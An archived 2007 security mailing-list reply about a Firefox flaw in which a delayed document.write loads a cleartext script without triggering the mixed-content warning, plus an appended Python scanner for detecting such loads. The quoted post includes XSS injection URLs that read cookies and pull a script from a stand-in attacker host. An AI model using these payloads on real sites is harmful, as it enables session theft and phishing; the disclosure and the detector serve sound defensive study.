
[VulnWatch] Re: [Full-disclosure] Mozilla Firefox Insecure Element Steal

To: "Michal Majchrowicz" <m.majchrowicz@gmail.com>
Subject: [VulnWatch] Re: [Full-disclosure] Mozilla Firefox Insecure Element Stealth Injection Vulnerability
From: 3APA3A <3APA3A@SECURITY.NNOV.RU>
Date: Wed, 4 Apr 2007 19:23:30 +0400
Cc: full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com, vulndiscuss@vulnwatch.org, <vulnwatch@vulnwatch.org>
In-reply-to: <3d3168e50704040429h7ead1c07v33d12573f1de276a@mail.gmail.com>
Organization: http://www.security.nnov.ru
References: <3d3168e50704040429h7ead1c07v33d12573f1de276a@mail.gmail.com>
Reply-to: 3APA3A <3APA3A@SECURITY.NNOV.RU>
Dear Michal Majchrowicz,

 This feature is not intended to protect against XSS, it's only intended
 to inform you that some information is transmitted in cleartext. You can
 simply change

 src="http://server2.com/xss.js

 to

 src="https://server2.com/xss.js

 to avoid this message.

--Wednesday, April 4, 2007, 3:29:14 PM, you wrote to full-disclosure@lists.grok.org.uk:

MM> When user visits sites over HTTPS protocol he is informed by the Web
MM> Browser every time the site tries to load unsecured (using HTTP
MM> protocol) element (script/iframe/object etc.).
MM> So for instance if we have XSS vulnerable site
MM> https://server.com/vuln.php?id=";><script>alert(document.cookie);</script>
MM> Every browser will execute it without any complaints since they cannot
MM> know where the code comes from. But this example will cause a warning:
MM> https://server.com/vuln.php?id=";><script
MM> src="http://server2.com/xss.js";></script>
MM> Web Browser knows that we are trying to load something over unsecure
MM> protocol.
MM> However Mozilla Firefox will fail with the following example and the
MM> user will think that all the elements are "safe":
MM> https://server.com/vuln.php?id=";><script>setTimeout("document.write('<script
MM> src=http://server2.com/xss.js></script>',10000)"</script>
MM> The "insecure element" will be added after Web Browser performs
MM> checking therefore allowing for instance phishing attacks. Internet
MM> Explorer is not vulnerable to this issue. Other Web Browsers weren't
MM> tested.



-- 
~/ZARAZA http://securityvulns.com/
The machine turned out to be capable of only a single operation,
namely multiplying 2x2, and even then getting it wrong. (Lem)
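
The timing gap discussed in this thread, seen from the auditing side, as an added example that is not part of either message: a check that only looks at markup present at parse time misses a cleartext load that an inline script writes into the page later. The scanner below is a heuristic sketch; the sample bodies are constructed from the hostnames in the quoted post, and the tag list is an illustrative subset.

```python
import re
from html.parser import HTMLParser

# Tag -> attribute that triggers a subresource fetch (illustrative subset).
URL_ATTRS = {"script": "src", "iframe": "src", "img": "src",
             "embed": "src", "object": "data"}
HTTP_URL = re.compile(r"http://[^\s'\"<>\\)]+", re.IGNORECASE)


class MixedContentScanner(HTMLParser):
    """Collect cleartext (http://) loads referenced by an HTTPS page."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.static = []     # (tag, url) present in markup at parse time
        self.deferred = []   # http:// URLs seen only inside inline script text
        self._script_text = None  # buffer while inside <script>...</script>

    def handle_starttag(self, tag, attrs):
        wanted = URL_ATTRS.get(tag)
        for name, value in attrs:
            if name == wanted and value and value.lower().startswith("http://"):
                self.static.append((tag, value))
        if tag == "script":
            self._script_text = []

    def handle_data(self, data):
        if self._script_text is not None:
            self._script_text.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script_text is not None:
            self.deferred += HTTP_URL.findall("".join(self._script_text))
            self._script_text = None


def scan(html):
    scanner = MixedContentScanner()
    scanner.feed(html)
    scanner.close()
    return {"static": scanner.static, "deferred": scanner.deferred}


# Constructed sample bodies modelled on the three cases in the quoted post.
INLINE_ONLY = "<html><body><script>var shown = 1;</script></body></html>"
STATIC_HTTP = '<html><body><script src="http://server2.com/xss.js"></script></body></html>'
DELAYED_WRITE = (r"<html><body><script>setTimeout(function () {"
                 r"document.write('<script src=http://server2.com/xss.js><\/script>');"
                 r"}, 10000);</script></body></html>")

if __name__ == "__main__":
    for name in ("INLINE_ONLY", "STATIC_HTTP", "DELAYED_WRITE"):
        print(name, scan(globals()[name]))
```

A URL assembled by string concatenation at run time will not match the pattern, so an empty `deferred` list is not proof that a page loads nothing over HTTP.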

